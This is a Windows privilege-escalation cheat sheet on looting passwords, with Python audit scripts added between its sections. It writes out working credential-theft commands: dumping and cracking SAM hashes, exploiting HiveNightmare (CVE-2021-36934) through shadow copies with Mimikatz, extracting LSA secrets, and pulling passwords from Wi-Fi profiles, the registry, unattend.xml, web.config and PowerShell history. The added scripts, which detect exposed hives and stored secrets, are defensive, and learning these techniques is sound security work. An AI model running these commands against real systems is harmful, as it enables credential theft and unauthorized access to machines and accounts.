EoP - Looting for passwords

1. Accessing Password Hashes

1.1 Security Account Manager (SAM) and SYSTEM Files

The SAM hive stores the password hashes of local accounts, as LM hashes (legacy) or NT hashes (commonly called NTLM hashes).

Locations:

  • %SystemRoot%\System32\config\SAM

  • %SystemRoot%\repair\SAM

  • %SystemRoot%\System32\config\RegBack\SAM

1.2 Extracting Hashes

Using pwdump:

pwdump SYSTEM SAM > /root/sam.txt

Using samdump2:

samdump2 SYSTEM SAM -o sam.txt

1.3 Cracking Hashes

John the Ripper:

john --format=NT /root/sam.txt

Hashcat:

hashcat -m 1000 -a 0 sam.txt wordlist.txt

2. Exploiting Vulnerabilities

2.1 HiveNightmare (CVE-2021-36934)

This vulnerability (also known as SeriousSAM) is caused by overly permissive ACLs on the SAM, SYSTEM and SECURITY hives: non-administrative users can read copies of them from Volume Shadow Copies.

Check for Vulnerability:

icacls config\SAM

Run from %SystemRoot%\System32. If the output lists BUILTIN\Users with read access (for example BUILTIN\Users:(I)(RX)), the hive is readable by standard users; ensure BUILTIN\Users does not have read access.
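The icacls check above is done by eye; the script below is an added example (not part of the original page) that parses saved icacls output and reports every file on which BUILTIN\Users holds an allow ACE with a read right, so the check can be run over many hosts' output files. The icacls output embedded in it is constructed for the example, and the parser assumes the file path carries no spaces.

```python
import re

# Constructed icacls output for a host whose SAM hive is readable by standard
# users (the HiveNightmare condition). Not captured from a real system.
SAMPLE_VULNERABLE = r"""config\SAM BUILTIN\Administrators:(I)(F)
           NT AUTHORITY\SYSTEM:(I)(F)
           BUILTIN\Users:(I)(RX)
           APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

# Constructed output after the ACL has been corrected.
SAMPLE_HARDENED = r"""config\SAM BUILTIN\Administrators:(I)(F)
           NT AUTHORITY\SYSTEM:(I)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# One ACE as icacls prints it: "principal:(flag)(flag)..." where the groups
# carry inheritance markers (I, OI, CI), DENY, and rights such as F, M, RX.
ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<flags>(?:\([^)]*\))+)\s*$")

# Simple and specific rights that let the holder read the file's contents.
READ_RIGHTS = {"F", "M", "RX", "R", "RD"}


def parse_icacls(output):
    """Return a list of (path, principal, [flag groups]) from icacls text.

    icacls prints the first ACE of a file on the same line as its path and
    indents the remaining ACEs; this parser assumes the path has no spaces.
    """
    entries = []
    current_path = None
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if not raw.startswith(" "):
            current_path, _, line = line.partition(" ")
        m = ACE_RE.match(line)
        if m is None or current_path is None:
            continue
        flags = re.findall(r"\(([^)]*)\)", m.group("flags"))
        entries.append((current_path, m.group("principal"), flags))
    return entries


def readable_by(entries, principal="BUILTIN\\Users"):
    """Paths on which the principal holds an allow ACE granting read access."""
    hits = []
    for path, who, flags in entries:
        if who.lower() != principal.lower():
            continue
        # A group may hold comma-separated specific rights, e.g. "RD,RA".
        rights = {r.strip() for group in flags for r in group.split(",")}
        if "DENY" in rights:
            continue
        if rights & READ_RIGHTS:
            hits.append(path)
    return hits


def hive_nightmare_check(output):
    """Map each file in the icacls output to True when BUILTIN\\Users can read it."""
    entries = parse_icacls(output)
    exposed = set(readable_by(entries))
    return {path: path in exposed for path, _, _ in entries}


if __name__ == "__main__":
    for sample in (SAMPLE_VULNERABLE, SAMPLE_HARDENED):
        for path, exposed in hive_nightmare_check(sample).items():
            print(path, "EXPOSED to BUILTIN\\Users" if exposed else "ok")
```

Feed it the output of icacls run against SAM, SYSTEM and SECURITY in %SystemRoot%\System32\config; a True result for any of the three means standard users can read that hive.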

Exploitation Steps:

  1. List existing shadow copies:

     vssadmin list shadows

  2. Extract the hives from a shadow copy using Mimikatz:

     lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM

3. LAPS (Local Administrator Password Solution) Settings

Extract LAPS Settings

Command:

reg query "HKLM\Software\Policies\Microsoft Services\AdmPwd" /s

Key Values to Look For:

  • AdmPwdEnabled: LAPS enabled status.

  • AdminAccountName: Name of the administrator account.

  • PasswordComplexity: Password complexity requirements.

  • PasswordLength: Required password length.

  • PwdExpirationProtectionEnabled: Expiration protection status.
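The values listed above are easier to judge in bulk than by reading reg query output by hand. The script below is an added example (not from the original page): it parses the text that reg query /s prints for the AdmPwd policy key and reports policy gaps. The reg query output embedded in it is constructed; the thresholds are my own choices, with 14 taken from the LAPS default password length and 4 being the LAPS complexity level that requires all four character classes.

```python
import re

# Constructed `reg query ... /s` output for a weakened LAPS policy.
# Not captured from a real host.
SAMPLE_REG_OUTPUT = """
HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft Services\\AdmPwd
    AdmPwdEnabled    REG_DWORD    0x1
    AdminAccountName    REG_SZ    LocalAdmin
    PasswordComplexity    REG_DWORD    0x4
    PasswordLength    REG_DWORD    0x8
    PwdExpirationProtectionEnabled    REG_DWORD    0x0

"""

LAPS_POLICY_KEY = "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft Services\\AdmPwd"
MIN_LENGTH = 14      # LAPS default; anything shorter is a weakened policy
FULL_COMPLEXITY = 4  # large letters + small letters + numbers + specials

# reg query prints "    <name>    <type>    <data>" with runs of spaces.
VALUE_RE = re.compile(r"^\s+(?P<name>\S+)\s{2,}(?P<type>REG_\w+)\s{2,}(?P<data>.*)$")


def parse_reg_query(output):
    """Return {key_path: {value_name: (type, data)}} from reg query text."""
    keys = {}
    current = None
    for line in output.splitlines():
        if not line.strip():
            continue
        if line.startswith("ERROR:"):
            break  # key or value not found; nothing to parse
        if not line[0].isspace():
            current = line.strip()
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            keys[current][m.group("name")] = (m.group("type"), m.group("data").strip())
    return keys


def reg_dword(values, name, default=None):
    """Integer value of a REG_DWORD entry (reg query prints them as hex)."""
    if name not in values:
        return default
    vtype, data = values[name]
    return int(data, 16) if vtype == "REG_DWORD" else default


def assess_laps(output):
    """List of findings describing gaps in the LAPS policy; empty means OK."""
    values = parse_reg_query(output).get(LAPS_POLICY_KEY)
    if values is None:
        return ["LAPS policy key not present: local admin password is not managed by LAPS"]
    findings = []
    if reg_dword(values, "AdmPwdEnabled", 0) != 1:
        findings.append("AdmPwdEnabled is not 1: password management is disabled")
    length = reg_dword(values, "PasswordLength", MIN_LENGTH)
    if length < MIN_LENGTH:
        findings.append(f"PasswordLength is {length}, below the default of {MIN_LENGTH}")
    if reg_dword(values, "PasswordComplexity", FULL_COMPLEXITY) != FULL_COMPLEXITY:
        findings.append("PasswordComplexity is not 4: not all character classes are required")
    if reg_dword(values, "PwdExpirationProtectionEnabled", 0) != 1:
        findings.append("PwdExpirationProtectionEnabled is 0: expiry can be pushed past the policy maximum")
    return findings


if __name__ == "__main__":
    for finding in assess_laps(SAMPLE_REG_OUTPUT) or ["LAPS policy looks sound"]:
        print(finding)
```

Redirect the reg query command to a file on each host and run the script over the collected files; a host that prints the reg query "ERROR:" line is reported as unmanaged.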


4. Searching for Passwords in Files and Shares

4.1 Searching in Local Files

Commands:

findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config 2>nul >> results.txt

4.2 Searching in Remote Locations

  • SharePoint: Use SnaffPoint.

  • SMB Shares: Use Snaffler for automated searches.


5. Extracting Secrets with Mimikatz

Commands:

token::whoami /full
misc::shadowcopies
lsadump::secrets /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY

6. Finding Credentials in Configuration Files

6.1 Unattend.xml

Locations:

  • C:\unattend.xml

  • C:\Windows\Panther\Unattend.xml

Decode Base64 Passwords:

echo "base64_encoded_password" | base64 -d

Example Content:

<AutoLogon>
  <Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo=</Password>
  <Enabled>true</Enabled>
  <Username>Administrateur</Username>
</AutoLogon>
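The decode step above uses a Linux shell; the script below is an added example (not from the original page) that does the same audit over a whole unattend.xml so leftover deployment credentials can be found and removed. It handles the plain Base64 layout of the page's example and also the layout Windows itself writes, where the value is Base64 of UTF-16LE(password + "Password") inside a Value element with a PlainText flag. The document embedded in it is constructed: the AutoLogon block is the page's own snippet, the AdministratorPassword block and its password are made up, and the helper windows_unattend_encode exists only to build that sample.

```python
import base64
import xml.etree.ElementTree as ET


def windows_unattend_encode(password):
    """Encode a password the way Windows does for unattend.xml: append
    'Password', UTF-16LE, Base64. Used here only to build the sample."""
    return base64.b64encode((password + "Password").encode("utf-16-le")).decode("ascii")


# Constructed unattend.xml (namespace as Windows writes it); not from a real host.
SAMPLE_UNATTEND = f"""<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo=</Password>
        <Enabled>true</Enabled>
        <Username>Administrateur</Username>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword>
          <Value>{windows_unattend_encode('Example-Adm1n')}</Value>
          <PlainText>false</PlainText>
        </AdministratorPassword>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"""

PASSWORD_TAGS = {"Password", "AdministratorPassword"}


def _local(tag):
    """Strip the XML namespace so tags compare by local name."""
    return tag.rsplit("}", 1)[-1]


def decode_unattend_value(text, plain_text=False):
    """Return the stored password from its text form.

    Handles plaintext, the Windows layout (Base64 of UTF-16LE with the
    literal suffix 'Password'), and plain Base64 as in the page's example.
    """
    if plain_text:
        return text
    raw = base64.b64decode(text, validate=True)
    try:
        decoded = raw.decode("utf-16-le")
        if decoded.endswith("Password"):
            return decoded[: -len("Password")]
    except UnicodeDecodeError:
        pass  # odd length or invalid UTF-16: not the Windows layout
    return raw.decode("utf-8", errors="replace").rstrip("\n")


def find_unattend_passwords(xml_text):
    """List (parent element, username or None, decoded password) for every
    stored credential in an unattend.xml document."""
    root = ET.fromstring(xml_text)
    findings = []
    for parent in root.iter():
        for child in parent:
            if _local(child.tag) not in PASSWORD_TAGS:
                continue
            value_el = next((c for c in child if _local(c.tag) == "Value"), None)
            plain_el = next((c for c in child if _local(c.tag) == "PlainText"), None)
            text = (value_el.text if value_el is not None else child.text) or ""
            plain = plain_el is not None and (plain_el.text or "").strip().lower() == "true"
            user_el = next((c for c in parent if _local(c.tag) == "Username"), None)
            username = user_el.text if user_el is not None else None
            findings.append((_local(parent.tag), username, decode_unattend_value(text.strip(), plain)))
    return findings


if __name__ == "__main__":
    for where, user, secret in find_unattend_passwords(SAMPLE_UNATTEND):
        # Report presence and length only; the value itself stays out of logs.
        print(f"{where}: user={user!r} stored password of {len(secret)} characters")
```

Point it at the Panther and root unattend.xml locations listed above; any finding means the file should be deleted or its credential blocks removed, and the affected account's password rotated.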

7. IIS Web Config

Command:

Get-ChildItem -Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
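The Get-ChildItem command above only locates web.config files; the script below is an added example (not from the original page) that audits each one. It reports connection strings carrying a Password or Pwd key, appSettings entries whose key looks like a credential, and an impersonation identity with an embedded password, while treating a section that carries a configProtectionProvider attribute (the marker left by aspnet_regiis encryption) as protected. The web.config embedded in it is constructed, including the account names and the placeholder ciphertext.

```python
import re
import xml.etree.ElementTree as ET

# Constructed web.config: one plaintext connection string, one that uses
# integrated security, an appSettings section encrypted with aspnet_regiis,
# and an impersonation identity with an embedded password. Not from a real site.
SAMPLE_WEB_CONFIG = """<configuration>
  <connectionStrings>
    <add name="Main" connectionString="Server=db01;Database=app;User Id=appuser;Password=Wint3r!2024;" providerName="System.Data.SqlClient"/>
    <add name="Trusted" connectionString="Server=db02;Database=app;Integrated Security=True;" providerName="System.Data.SqlClient"/>
  </connectionStrings>
  <appSettings configProtectionProvider="RsaProtectedConfigurationProvider">
    <EncryptedData Type="http://www.w3.org/2001/04/xmlenc#Element" xmlns="http://www.w3.org/2001/04/xmlenc#">
      <CipherData><CipherValue>PLACEHOLDER-CIPHERTEXT</CipherValue></CipherData>
    </EncryptedData>
  </appSettings>
  <system.web>
    <identity impersonate="true" userName="CORP\\svc_web" password="Spr1ng-Serv1ce"/>
  </system.web>
</configuration>
"""

CRED_KEYS = {"password", "pwd"}


def connection_string_password(conn):
    """Return the password from an ADO-style connection string, or None."""
    for part in conn.split(";"):
        key, sep, value = part.partition("=")
        if sep and key.strip().lower() in CRED_KEYS and value.strip():
            return value.strip()
    return None


def audit_web_config(xml_text):
    """Return (finding, location, redacted detail) tuples for one web.config.

    Sections carrying configProtectionProvider are encrypted on disk and are
    reported as protected rather than parsed.
    """
    root = ET.fromstring(xml_text)
    findings = []
    for section_name in ("connectionStrings", "appSettings"):
        section = root.find(section_name)
        if section is None:
            continue
        provider = section.get("configProtectionProvider")
        if provider:
            findings.append(("encrypted-section", section_name, provider))
            continue
        for add in section.findall("add"):
            conn = add.get("connectionString")
            if conn is not None:
                if connection_string_password(conn):
                    findings.append(("plaintext-connection-string", add.get("name"), "Password=***"))
                continue
            key = add.get("key", "")
            if re.search(r"(?i)pass|pwd|secret", key) and add.get("value"):
                findings.append(("plaintext-app-setting", key, "value=***"))
    # <identity impersonate="true" userName=... password=...> under system.web
    for identity in root.iter("identity"):
        if identity.get("password"):
            findings.append(("impersonation-password", identity.get("userName"), "password=***"))
    return findings


if __name__ == "__main__":
    for finding in audit_web_config(SAMPLE_WEB_CONFIG):
        print(*finding)
```

Secrets are never included in the report, only their location; the fix for a plaintext finding is to move the application to integrated security or encrypt the section with aspnet_regiis -pe, then rotate the exposed credential.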

8. Additional Sources of Passwords

8.1 Wireless Passwords

Commands:

netsh wlan show profiles
netsh wlan show profile <SSID> key=clear

8.2 Sticky Notes

Extract passwords from Sticky Notes SQLite database:

C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite

8.3 PowerShell History

Command:

type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
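Both the findstr sweep in section 4 and the PowerShell history check above surface lines that need a human to read each secret. The script below is an added example (not from the original page) that does the same sweep over collected files with a small set of patterns and redacts the matched secret in its report, so results can be shared with application owners. The file contents and paths embedded in it are constructed (the user name alice, the server names and every secret value are made up), and the pattern list is a starting point to tune rather than a complete catalogue.

```python
import re

# Each pattern names the secret in a group called "secret" so the report can
# redact it. Constructed for this example; extend for your own environment.
PATTERNS = [
    ("kv-password",
     re.compile(r'(?i)\b(?:pass(?:word|wd)?|pwd)\s*[=:]\s*["\']?(?P<secret>[^"\'\s;]+)')),
    ("config-add-value",
     re.compile(r'(?i)key\s*=\s*"[^"]*(?:password|pwd)[^"]*"\s+value\s*=\s*"(?P<secret>[^"]*)"')),
    ("ps-securestring",
     re.compile(r'(?i)ConvertTo-SecureString\b(?=.*-AsPlainText).*?["\'](?P<secret>[^"\']+)["\']')),
    ("net-use-cred",
     re.compile(r'(?i)\bnet\s+use\b.*?/user:\S+\s+(?P<secret>\S+)')),
]

HISTORY_PATH = r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"

# Constructed sample artefacts keyed by the path a real scan would have read.
SAMPLE_FILES = {
    r"C:\app\settings.ini": ["[database]", "host=db01", "password=Hunter2!"],
    r"C:\inetpub\site\web.config": [
        '<add key="DbPassword" value="Sp00ky-Secret"/>',
        '<add key="Timeout" value="30"/>',
    ],
    HISTORY_PATH: [
        r"Get-ChildItem C:\Users",
        '$pw = ConvertTo-SecureString "Summ3r2024!" -AsPlainText -Force',
        r"net use Z: \\fileserver\share /user:corp\svc Passw0rd",
    ],
}


def scan_lines(source, lines):
    """Return (source, line_no, pattern_name, redacted_line) for each hit.

    A line is reported once, under the first pattern that matches. A lone "*"
    is the net use prompt-for-password form and is not a secret.
    """
    hits = []
    for number, line in enumerate(lines, start=1):
        for name, pattern in PATTERNS:
            m = pattern.search(line)
            if m is None or m.group("secret") == "*":
                continue
            redacted = line[: m.start("secret")] + "***" + line[m.end("secret"):]
            hits.append((source, number, name, redacted.rstrip("\n")))
            break
    return hits


def scan_all(files=SAMPLE_FILES):
    """Scan every (path, lines) pair; for real use, read each path from disk."""
    return [hit for source, lines in files.items() for hit in scan_lines(source, lines)]


if __name__ == "__main__":
    for source, number, name, redacted in scan_all():
        print(f"{source}:{number} [{name}] {redacted}")
```

The PSReadLine hits are worth acting on even though the history file is per-user: a credential typed on the command line has already been written to disk in clear text, so the account's password needs rotating and the history line removing.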

8.4 Registry Searches

Commands:

REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
